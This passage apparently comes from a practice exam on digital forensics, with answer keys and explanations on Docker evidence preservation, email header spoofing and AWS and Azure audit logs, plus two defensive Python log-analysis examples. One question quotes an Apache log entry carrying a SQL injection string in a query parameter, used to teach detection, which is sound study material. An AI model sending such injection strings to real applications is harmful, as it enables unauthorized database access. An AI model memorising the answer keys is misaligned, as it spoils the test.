A forensic analyst is examining a Docker container suspected of being used for malicious activities. The container was running an Alpine Linux image and was stopped 2 hours ago. Which of the following is the BEST first step to collect volatile evidence?

A.Collect the container's log files from /var/log/
B.Create a memory dump of the container's process
C.Export the container's filesystem using docker export
D.Run docker attach to reconnect to the container
AnswerC

docker export writes the container's merged filesystem (image layers plus its writable layer) to a tar archive; data in separately mounted volumes is not included and must be collected from its host path.

Why this answer

When a container is stopped, its process state and other in-memory data are lost. The best first step is to create a forensic image of the container's filesystem layers, which are still available on the host. Docker containers' filesystems are stored as layers on the host, accessible via docker export or by copying the container's filesystem from /var/lib/docker/overlay2/.

139
MCQmedium

An email header contains the following line: "Received: from mail.evil.com (192.0.2.1) by mail.victim.com with ESMTP; Mon, 20 Mar 2023 10:00:00 -0500". The next Received line shows a different IP. What does this indicate?

A.The email is likely spoofed
B.The email's DKIM signature is invalid
C.The email was encrypted in transit
D.The email was forwarded from another server
AnswerA

Each Received line is added by the server that accepted the message, so successive lines naturally show different IPs. The hop becomes suspicious when the name the sender announced ('from mail.evil.com') does not match the IP that mail.victim.com actually recorded (192.0.2.1), when the chain does not connect (the 'by' host of one line does not reappear as the 'from' host of the next), or when the timestamps run backwards.

Why this answer

Only Received lines added by servers you trust are reliable; anything below them may have been forged by the sender. A mismatch between the claimed origin and the recorded IP in an otherwise consistent chain is the classic sign of a spoofed origin. A DKIM failure would show in an Authentication-Results header, encryption in transit would appear as 'with ESMTPS' on the hop, and a plain forward leaves a consistent chain.
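An added example (not from the page) covering the checks in this question and in question 137 above: it parses the Received chain in delivery order, verifies that each hop's 'by' host is the next hop's 'from' host and that timestamps move forward, reads the Received-SPF verdict and compares the From, Reply-To and Return-Path domains. The message is constructed around the Received line quoted in the question; the hostnames and addresses are invented.

```python
import email
import re
from email.utils import parseaddr, parsedate_to_datetime

# Constructed message modelled on the Received line in the question (not a real email).
RAW_MESSAGE = """\
Return-Path: <bounce@evil.example>
Received: from mail.evil.com (192.0.2.1) by mail.victim.com with ESMTP; Mon, 20 Mar 2023 10:00:00 -0500
Received: from bank.example (unknown [198.51.100.9]) by mail.evil.com with SMTP; Mon, 20 Mar 2023 09:59:50 -0500
Received-SPF: fail (mail.victim.com: domain of bank.example does not designate 192.0.2.1 as permitted sender) client-ip=192.0.2.1;
Authentication-Results: mail.victim.com; spf=fail smtp.mailfrom=bank.example; dkim=none
From: "Bank Security" <alerts@bank.example>
Reply-To: recover-account@evil.example
To: victim@victim.com
Subject: Urgent: verify your account
Message-ID: <20230320145950.12345@bank.example>
Date: Mon, 20 Mar 2023 09:59:45 -0500

Please verify your account at the link below.
"""

IPV4_RE = re.compile(r"\[?(\d{1,3}(?:\.\d{1,3}){3})\]?")


def domain_of(header_value):
    addr = parseaddr(header_value or "")[1]
    return addr.rpartition("@")[2].lower() or None


def parse_received(value):
    """Pull the claimed sender, the IP the receiver recorded, the receiving host and the timestamp."""
    value = " ".join(value.split())
    frm = re.search(r"\bfrom\s+([^\s(;]+)", value)
    by = re.search(r"\bby\s+([^\s(;]+)", value)
    ip = IPV4_RE.search(value)
    when = parsedate_to_datetime(value.rsplit(";", 1)[1].strip()) if ";" in value else None
    return {"from": frm.group(1).lower() if frm else None,
            "ip": ip.group(1) if ip else None,
            "by": by.group(1).lower() if by else None,
            "when": when}


def analyze_headers(raw):
    msg = email.message_from_string(raw)
    # Each hop prepends its Received header, so the top one is the newest; reverse to read
    # the path in delivery order, origin first.
    hops = [parse_received(v) for v in reversed(msg.get_all("Received", []))]
    indicators = []
    for prev, cur in zip(hops, hops[1:]):
        if prev["by"] and cur["from"] and prev["by"] != cur["from"]:
            indicators.append(f"received-chain-break: {prev['by']} -> {cur['from']}")
        if prev["when"] and cur["when"] and (prev["when"] - cur["when"]).total_seconds() > 300:
            indicators.append("received-timestamps-run-backwards")   # 5 min tolerance for clock skew
    spf_hdr = msg.get("Received-SPF")
    spf = spf_hdr.split()[0].lower() if spf_hdr else None
    from_d = domain_of(msg.get("From"))
    reply_d = domain_of(msg.get("Reply-To"))
    rp_d = domain_of(msg.get("Return-Path"))
    if spf == "fail":
        indicators.append("spf-fail")
    if reply_d and reply_d != from_d:
        indicators.append(f"reply-to-domain-mismatch: {from_d} vs {reply_d}")
    if rp_d and rp_d != from_d:
        indicators.append(f"return-path-domain-mismatch: {from_d} vs {rp_d}")
    return {"hops": hops, "spf": spf, "from_domain": from_d, "indicators": indicators}


if __name__ == "__main__":
    result = analyze_headers(RAW_MESSAGE)
    for h in result["hops"]:
        print(f"{h['when']}  from {h['from']} [{h['ip']}] by {h['by']}")
    print("\n".join(result["indicators"]))
```

The hop list shows why the bottom line cannot be trusted: it was written by mail.evil.com, the attacker's own server, and claims a 'from bank.example' origin that nothing above it confirms, while the Received-SPF verdict recorded by mail.victim.com for the connecting IP 192.0.2.1 is a fail. Start your reading at the first hop recorded by a server you control.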

140
Multi-Selecteasy

Which TWO of the following are common challenges in cloud forensics that are not typically encountered in traditional on-premises forensics?

Select 2 answers
A.Difficulty in obtaining search warrants
B.Lack of forensic tools for cloud environments
C.Volatile evidence that may be lost on system shutdown
D.Multi-tenancy and co-mingling of data
E.Data jurisdiction and legal compliance across regions
AnswersD, E

Multiple tenants share the same physical infrastructure, complicating data isolation.

Why this answer

Multi-tenancy and data jurisdiction are unique to cloud environments. Volatile evidence is a general challenge but not exclusive to cloud. Lack of tools is not a typical challenge.

Legal warrants apply to both.

141
Multi-Selecthard

An Azure Activity Log shows a suspicious 'Delete Virtual Machine' operation from an IP address in a foreign country. Which THREE actions should the forensic investigator take immediately to preserve evidence and assess impact?

Select 3 answers
A.Check if the VM's disks have been copied or exported
B.Isolate the affected VM from the network
C.Export the Activity Log to a secure storage
D.Restore the VM from the latest backup
E.Immediately revoke all IAM permissions
AnswersA, B, C

Determine if data exfiltration occurred by checking disk exports.

Why this answer

Isolating the VM stops further action by the attacker, exporting the Activity Log to storage the attacker cannot reach preserves it beyond its default 90-day retention, and checking for disk snapshot, copy or export operations answers whether data left the environment before the deletion. Restoring from backup and revoking every permission are recovery actions that can destroy evidence or disrupt the investigation if done first.

142
MCQmedium

A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?

A.AWS CloudTrail
B.VPC Flow Logs
C.Amazon S3 access logs
D.AWS Config
AnswerA

CloudTrail is the audit log for API activity in AWS.

Why this answer

AWS CloudTrail records the DeleteBucket call as a management event (logged by default) with userIdentity, sourceIPAddress, userAgent, eventTime and requestParameters.bucketName. S3 server access logs are a best-effort, delayed record of requests made to the bucket and not the authoritative record of the API call and its caller, VPC Flow Logs hold only network metadata, and AWS Config records the resulting configuration change without the caller's IP.
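An added example, not from the page, that normalises the two audit formats covered in this question and in question 125 above (a CloudTrail DeleteBucket record and a Cloud Audit Logs entry for v1.compute.instances.delete) into who / action / resource / source IP and flags calls from outside a trusted network or that destroy resources. The two records and the trusted networks are constructed; the field names follow the documented record layouts of both services.

```python
import json
from ipaddress import ip_address, ip_network

# Constructed records modelled on the two formats (not real log data). Field names follow the
# documented CloudTrail record and Cloud Audit Logs LogEntry layouts; identities, IPs and
# resource names are invented.
CLOUDTRAIL_RECORD = json.loads("""{
  "eventVersion": "1.08",
  "userIdentity": {"type": "IAMUser", "principalId": "AIDAEXAMPLE", "userName": "alice",
                   "arn": "arn:aws:iam::123456789012:user/alice", "accountId": "123456789012",
                   "accessKeyId": "AKIAEXAMPLE"},
  "eventTime": "2025-03-10T08:15:22Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "DeleteBucket",
  "awsRegion": "us-east-1",
  "sourceIPAddress": "203.0.113.45",
  "userAgent": "aws-cli/2.15.0",
  "requestParameters": {"bucketName": "customer-exports"},
  "responseElements": null,
  "eventType": "AwsApiCall",
  "recipientAccountId": "123456789012"
}""")

GCP_AUDIT_ENTRY = json.loads("""{
  "protoPayload": {
    "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
    "authenticationInfo": {"principalEmail": "bob@example.test"},
    "requestMetadata": {"callerIp": "198.51.100.77",
                        "callerSuppliedUserAgent": "google-cloud-sdk gcloud/470.0.0"},
    "serviceName": "compute.googleapis.com",
    "methodName": "v1.compute.instances.delete",
    "resourceName": "projects/example-proj/zones/us-central1-a/instances/web-01"
  },
  "logName": "projects/example-proj/logs/cloudaudit.googleapis.com%2Factivity",
  "timestamp": "2025-03-10T09:02:11.334455Z",
  "severity": "NOTICE"
}""")


def normalize(record):
    """Reduce a CloudTrail record or a GCP audit LogEntry to who / action / resource / source IP."""
    if "protoPayload" in record:
        p = record["protoPayload"]
        meta = p.get("requestMetadata", {})
        return {
            "source": "gcp-audit",
            "when": record.get("timestamp"),
            "who": p.get("authenticationInfo", {}).get("principalEmail"),
            "action": p.get("methodName"),
            "resource": p.get("resourceName"),
            "ip": meta.get("callerIp"),
            "user_agent": meta.get("callerSuppliedUserAgent"),
        }
    if "eventVersion" in record:
        ident = record.get("userIdentity", {})
        # For AssumedRole calls the ARN is the session; the issuing role sits in sessionContext.
        issuer = ident.get("sessionContext", {}).get("sessionIssuer", {}).get("arn")
        who = ident.get("arn") or ident.get("invokedBy") or ident.get("type")
        params = record.get("requestParameters") or {}
        return {
            "source": "cloudtrail",
            "when": record.get("eventTime"),
            "who": who + (f" (via {issuer})" if issuer else ""),
            "action": f"{record.get('eventSource')}:{record.get('eventName')}",
            "resource": params.get("bucketName") or params.get("instanceId") or json.dumps(params, sort_keys=True),
            "ip": record.get("sourceIPAddress"),
            "user_agent": record.get("userAgent"),
        }
    raise ValueError("unrecognised audit record shape")


def triage(records, trusted_nets, destructive=("delete", "remove", "terminate")):
    """Normalize and flag events from outside trusted networks or that destroy resources."""
    nets = [ip_network(n) for n in trusted_nets]
    out = []
    for rec in records:
        ev = normalize(rec)
        flags = []
        try:
            if not any(ip_address(ev["ip"]) in n for n in nets):
                flags.append("untrusted-source-ip")
        except ValueError:                  # e.g. "AWS Internal" or a service call with no IP
            flags.append("non-ip-source")
        if any(word in (ev["action"] or "").lower() for word in destructive):
            flags.append("destructive-action")
        ev["flags"] = flags
        out.append(ev)
    return out


if __name__ == "__main__":
    for ev in triage([CLOUDTRAIL_RECORD, GCP_AUDIT_ENTRY], ["10.0.0.0/8", "192.0.2.0/24"]):
        print(f"{ev['when']} {ev['source']:10} {ev['who']:40} {ev['action']:38} {ev['resource']} {ev['flags']}")
```

Feed it the records from a CloudTrail export (the Records array of each gzipped file) and from a Cloud Logging export; the same trusted-network list then applies across both providers, and the flags give a first cut of the events worth a timeline entry.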

143
Multi-Selectmedium

A security analyst is investigating a potential container escape from a Docker container. Which THREE artifacts should the analyst collect to analyze the incident? (Select THREE.)

Select 3 answers
A.Host system's audit logs (e.g., /var/log/auth.log)
B.Network traffic captures from the host's physical NIC
C.Container image layers from the registry
D.Container's memory dump
E.Docker daemon logs (e.g., journalctl -u docker)
AnswersA, C, E

Host logs may show unusual system calls or access from the container.

Why this answer

Host audit logs show what an escaped process did on the host (new sessions, privilege changes, suspicious system calls if auditd was running), Docker daemon logs show how the container was created and with which privileges, capabilities or host mounts, and the image layers reveal the tooling shipped inside it. A memory dump of the container's processes is only possible while they are still running, and a capture on the host NIC helps only if one was already in place when the escape happened.

144
Multi-Selecthard

Which THREE of the following are challenges specific to container forensics?

Select 3 answers
A.Ephemeral nature of containers: containers are often short-lived and can be deleted quickly
B.Containers cannot be imaged using standard forensic tools
C.Container logs are always stored in a centralized location
D.Multiple layers in a container image require analysis of each layer for forensic artifacts
E.Containers share the host kernel, so kernel-level artifacts are not available
AnswersA, D, E

Containers are designed to be ephemeral, making forensic acquisition time-sensitive.

Why this answer

The ephemeral nature, layered file systems, and shared kernel are key challenges in container forensics.

145
MCQeasy

A security analyst is reviewing Apache access logs and finds the entry: 192.168.1.100 - - [10/Mar/2025:08:12:34 +0000] "GET /search?q=test' OR '1'='1 HTTP/1.1" 200 532. Which attack does this log entry most likely indicate?

A.Cross-site scripting (XSS)
B.Remote file inclusion (RFI)
C.SQL injection (SQLi)
D.Path traversal
AnswerC

The single quotes and OR '1'='1 are characteristic of SQLi.

Why this answer

The presence of ' OR '1'='1 in the query string is a classic SQL injection attempt, designed to bypass authentication or extract data.

146
MCQhard

A forensic analyst is investigating a Docker container that was used to launch a network attack. The container has been stopped but not removed. Which action should the analyst take FIRST to preserve volatile evidence?

A.Restart the container and use 'docker exec' to collect evidence
B.Use 'docker inspect' to view container metadata only
C.Use 'docker save' to export the container as a tar file
D.Use 'docker commit' to create an image of the container
AnswerD

This captures the current filesystem state without altering it.

Why this answer

The container is stopped, so there is no process memory left to capture; what remains on the host is its filesystem (image layers plus the writable layer), its metadata and its logs. 'docker commit' freezes the writable layer into an image that can be saved with 'docker save' and hashed, and 'docker export' produces the same filesystem as a tar archive; either is an acceptable first acquisition step. 'docker exec' needs a running container, so option A restarts it and alters state; 'docker save' operates on images, not containers; 'docker inspect' records metadata but preserves nothing. Collect the inspect output and 'docker logs' after the filesystem has been captured.

147
MCQmedium

An organization uses Azure. A security analyst needs to investigate a suspicious login event. Which Azure log contains details about user sign-ins, including IP address, timestamp, and success/failure status?

A.Azure Monitor Metrics
B.Azure AD Sign-in logs
C.Azure Activity Logs
D.Azure Security Center alerts
AnswerB

Azure AD Sign-in logs capture user authentication events with IP, timestamp, and status.

Why this answer

Azure AD sign-in logs (the service is now branded Microsoft Entra ID) record every interactive and non-interactive authentication with the user, application, client IP address, location, device, timestamp and the success or failure status with its reason code, which is exactly what a suspicious-login investigation needs. The Azure Activity Log records subscription-level control-plane operations such as resource creation, deletion and role assignments, not sign-ins. Azure Monitor Metrics are numeric performance counters, and Security Center (now Microsoft Defender for Cloud) alerts are detections derived from such logs rather than the authentication record itself.

148
MCQeasy

Which cloud forensic challenge refers to the inability to physically access the storage media where data resides?

A.Data jurisdiction
B.Lack of physical access
C.Multi-tenancy
D.Volatility of evidence
AnswerB

In cloud forensics, investigators cannot physically seize servers.

Why this answer

Volatility of evidence relates to the ephemeral nature of cloud data. Multi-tenancy is about shared resources. Data jurisdiction is legal.

Lack of physical access is a key challenge.

149
MCQmedium

In cloud forensics, which AWS service provides a centralized log of API calls made by users and services, often used to investigate unauthorized access or configuration changes?

A.AWS CloudWatch
B.AWS CloudTrail
C.AWS Config
D.AWS VPC Flow Logs
AnswerB

CloudTrail records API activity for auditing and forensic analysis.

Why this answer

AWS CloudTrail records all API calls for governance, compliance, and operational auditing, making it essential for forensic investigations in AWS.

150
MCQmedium

During a cloud forensic investigation, an analyst needs to identify who deleted an S3 bucket in an AWS environment. Which AWS service log should the analyst examine to find the API call and the associated IAM user or role?

A.AWS CloudTrail
B.Amazon S3 server access logs
C.AWS Config
D.Amazon CloudWatch Logs
AnswerA

CloudTrail logs all API calls and is the primary source for tracking user activity.

Why this answer

AWS CloudTrail records API calls made to AWS services, including S3 bucket deletion, along with the identity of the caller.
